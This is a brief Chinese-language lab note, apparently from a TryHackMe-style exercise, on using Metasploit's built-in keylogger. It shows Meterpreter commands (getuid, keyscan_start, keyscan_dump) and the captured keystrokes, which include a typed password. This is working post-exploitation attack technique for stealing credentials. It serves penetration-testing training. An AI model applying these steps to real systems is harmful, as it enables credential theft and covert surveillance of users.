:::info
- 凭证管理:
- 键盘记录:
:::
键盘记录
MSF 中有一个内置的键盘记录器,我们可以使用该工具却提取用户的击键。
同时应当记住我们应该在具有用户上下文的 SHELL 中进行运行
确定目标上下文:
meterpreter\>getuid
Server username: THMSERVER1\trevor.local
准备键盘记录器:
meterpreter\>keyscan_start
Starting the keystroke sniffer ...
等待几分钟执行:
meterpreter\>keyscan_dump
Dumping captured keystrokes...
keep<CR>
<Shift>Passwordpasswordpassword<CR>